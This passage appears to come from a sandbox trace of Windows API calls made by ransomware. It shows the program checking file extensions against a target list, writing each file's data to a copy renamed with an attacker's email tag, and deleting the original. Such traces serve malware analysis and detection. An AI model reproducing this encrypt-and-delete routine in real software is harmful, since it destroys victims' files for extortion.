[0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".zip") returned 4 [0048.560] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.560] lstrlenW (lpString=".rar") returned 4 [0048.560] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.560] lstrlenW (lpString=".bz2") returned 4 [0048.560] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString=".7z") returned 3 [0048.560] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".dbf") returned 4 [0048.560] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".1cd") returned 4 [0048.560] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".jpg") returned 4 [0048.560] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".doc") returned 4 [0048.560] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString=".docx") returned 5 [0048.560] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.560] lstrlenW (lpString=".pdf") returned 4 [0048.560] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.560] lstrlenW (lpString=".xls") returned 4 [0048.560] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.560] lstrlenW (lpString=".xlsx") returned 5 [0048.560] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.560] lstrlenW (lpString=".ppt") returned 4 [0048.560] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.560] lstrlenW (lpString=".zip") returned 4 [0048.560] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.561] lstrlenW (lpString=".rar") returned 4 [0048.561] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.561] lstrlenW (lpString=".bz2") returned 4 [0048.561] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.561] lstrlenW (lpString=".7z") returned 3 [0048.561] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.561] lstrlenW (lpString=".dbf") returned 4 [0048.561] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.561] lstrlenW (lpString=".1cd") returned 4 [0048.561] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0048.561] lstrlenW (lpString=".jpg") returned 4 [0048.561] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.561] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.561] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.561] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2527) returned 1 [0048.561] CloseHandle (hObject=0x210) returned 1 [0048.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20 [0048.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.562] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.562] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.640] GetLastError () returned 0x0 [0048.640] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x9df, lpOverlapped=0x0) returned 1 [0048.642] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0048.643] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.643] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.643] SetEndOfFile (hFile=0x220) returned 1 [0048.643] CloseHandle (hObject=0x220) returned 1 [0048.643] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.643] SetEndOfFile (hFile=0x210) returned 1 [0048.644] CloseHandle (hObject=0x210) returned 1 [0048.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.644] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1 [0048.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.644] lstrlenW (lpString=".doc") returned 4 [0048.644] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.644] lstrlenW (lpString=".docx") returned 5 [0048.644] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.644] lstrlenW (lpString=".pdf") returned 4 [0048.644] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.644] lstrlenW (lpString=".xls") returned 4 [0048.644] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.644] lstrlenW (lpString=".xlsx") returned 5 [0048.644] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.644] lstrlenW (lpString=".ppt") returned 4 [0048.645] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".zip") returned 4 [0048.645] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString=".rar") returned 4 [0048.645] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString=".bz2") returned 4 [0048.645] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.645] lstrlenW (lpString=".7z") returned 3 [0048.645] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".dbf") returned 4 [0048.645] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".1cd") returned 4 [0048.645] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".jpg") returned 4 [0048.645] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".doc") returned 4 [0048.645] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.645] lstrlenW (lpString=".docx") returned 5 [0048.645] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.645] lstrlenW (lpString=".pdf") returned 4 [0048.645] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString=".xls") returned 4 [0048.645] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString=".xlsx") returned 5 [0048.645] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.645] lstrlenW (lpString=".ppt") returned 4 [0048.645] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.645] lstrlenW (lpString=".zip") returned 4 [0048.646] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.646] lstrlenW (lpString=".rar") returned 4 [0048.646] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.646] lstrlenW (lpString=".bz2") returned 4 [0048.646] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.646] lstrlenW (lpString=".7z") returned 3 [0048.646] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.646] lstrlenW (lpString=".dbf") returned 4 [0048.646] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.646] lstrlenW (lpString=".1cd") returned 4 [0048.646] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.646] lstrlenW (lpString=".jpg") returned 4 [0048.646] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.646] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.646] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.646] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.647] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=19525) returned 1 [0048.647] CloseHandle (hObject=0x210) returned 1 [0048.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 0x20 [0048.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.647] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.647] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.648] GetLastError () returned 0x0 [0048.648] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x4c45, lpOverlapped=0x0) returned 1 [0048.965] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x4c50, lpOverlapped=0x0) returned 1 [0048.966] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.966] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.967] SetEndOfFile (hFile=0x220) returned 1 [0048.967] CloseHandle (hObject=0x220) returned 1 [0048.967] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.967] SetEndOfFile (hFile=0x210) returned 1 [0048.970] CloseHandle (hObject=0x210) returned 1 [0048.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.971] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0048.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.971] lstrlenW (lpString=".doc") returned 4 [0048.971] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.971] lstrlenW (lpString=".docx") returned 5 [0048.971] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.971] lstrlenW (lpString=".pdf") returned 4 [0048.971] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.971] lstrlenW (lpString=".xls") returned 4 [0048.971] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.971] lstrlenW (lpString=".xlsx") returned 5 [0048.971] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.971] lstrlenW (lpString=".ppt") returned 4 [0048.971] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.971] lstrlenW (lpString=".zip") returned 4 [0048.971] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.971] lstrlenW (lpString=".rar") returned 4 [0048.971] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.971] lstrlenW (lpString=".bz2") returned 4 [0048.971] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString=".7z") returned 3 [0048.972] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".dbf") returned 4 [0048.972] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".1cd") returned 4 [0048.972] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".jpg") returned 4 [0048.972] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".doc") returned 4 [0048.972] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString=".docx") returned 5 [0048.972] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.972] lstrlenW (lpString=".pdf") returned 4 [0048.972] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString=".xls") returned 4 [0048.972] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.972] lstrlenW (lpString=".xlsx") returned 5 [0048.972] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.972] lstrlenW (lpString=".ppt") returned 4 [0048.972] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".zip") returned 4 [0048.972] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.972] lstrlenW (lpString=".rar") returned 4 [0048.972] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.972] lstrlenW (lpString=".bz2") returned 4 [0048.972] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.972] lstrlenW (lpString=".7z") returned 3 [0048.972] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.972] lstrlenW (lpString=".dbf") returned 4 [0048.973] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.973] lstrlenW (lpString=".1cd") returned 4 [0048.973] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.973] lstrlenW (lpString=".jpg") returned 4 [0048.973] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.973] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.973] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.973] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=4991) returned 1 [0048.973] CloseHandle (hObject=0x210) returned 1 [0048.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 0x20 [0048.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.974] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.974] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0049.319] GetLastError () returned 0x0 [0049.319] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x137f, lpOverlapped=0x0) returned 1 [0049.321] WriteFile (in: hFile=0x1d0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1380, lpOverlapped=0x0) returned 1 [0049.322] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.322] WriteFile (in: hFile=0x1d0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.322] SetEndOfFile (hFile=0x1d0) returned 1 [0049.322] CloseHandle (hObject=0x1d0) returned 1 [0049.322] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.322] SetEndOfFile (hFile=0x210) returned 1 [0049.323] CloseHandle (hObject=0x210) returned 1 [0049.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.323] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.324] lstrlenW (lpString=".doc") returned 4 [0049.324] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.324] lstrlenW (lpString=".docx") returned 5 [0049.324] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.324] lstrlenW (lpString=".pdf") returned 4 [0049.324] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.324] lstrlenW (lpString=".xls") returned 4 [0049.324] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.324] lstrlenW (lpString=".xlsx") returned 5 [0049.324] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.324] lstrlenW (lpString=".ppt") returned 4 [0049.324] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 